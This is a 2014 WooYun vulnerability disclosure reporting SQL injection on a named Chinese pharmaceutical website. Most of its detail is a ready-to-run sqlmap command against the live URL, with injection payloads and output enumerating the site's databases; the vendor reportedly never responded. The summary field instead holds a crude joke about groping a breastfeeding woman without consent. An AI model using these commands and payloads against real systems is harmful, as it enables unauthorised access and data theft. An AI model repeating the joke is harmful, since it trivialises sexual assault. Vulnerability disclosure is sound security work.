当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-060222

漏洞标题:中国医药网存在SQL注射可泄露敏感数据

相关厂商:中国医药网

漏洞作者: Lonely

提交时间:2014-05-10 22:37

修复时间:2014-06-24 22:38

公开时间:2014-06-24 22:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-06-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

读书时一直暗恋一个女孩,但没勇气表白,更没胆量碰她。毕业后,她已经结婚了而且有孩子了。一天下午,我看到她抱着娃娃在喂奶,我找了个很好的借口。我走到她面前,一把两手按住她的咪咪,然后跟她娃娃说,喊叔叔,不喊不给吃!~~

详细说明:

浙江网盛生意宝 看样子很大的公司 应该不会忽略吧。
sqlmap.py -u "http://expo.pharmnet.com.cn/pro_product/browse.cgi?id=489966&asid=114479 asid=114479" --dbs

漏洞证明:

注入点 :

sqlmap.py -u "http://expo.pharmnet.com.cn/pro_product/browse.cgi?id=489966&asid=114479 asid=114479" --dbs
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=489966 AND 8374=8374&asid=114479 asid=114479
Type: UNION query
Title: MySQL UNION query (NULL) - 84 columns
Payload: id=-1616 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a617171,0x676e
7a444c7059546879,0x716c686271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
,NULL,NULL,NULL,NULL,NULL,NULL#&asid=114479 asid=114479
---
[19:20:37] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5
[19:20:37] [INFO] fetching database names
[19:20:37] [INFO] the SQL query used returns 25 entries
available databases [25]:
[*] adsadmin_business
[*] adsadmin_hub
[*] bbs
[*] bbs_pharmnet
[*] chinafdc_law_com
[*] chinapharmnet
[*] dissertation
[*] drugforum
[*] fdc_law_com_cn
[*] fdc_new
[*] fdc_new_bak
[*] information_schema
[*] net_articles
[*] netsun_cate
[*] netsun_ecp
[*] netsun_forum
[*] netsun_key
[*] netsun_Q
[*] pharm
[*] pharm_Q
[*] pharm_search
[*] pharmnet
[*] service
[*] session_tmps
[*] test


权限蛮大 好像都能脱 未深入。

修复方案:

求不忽略。

版权声明:转载请注明来源 Lonely@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝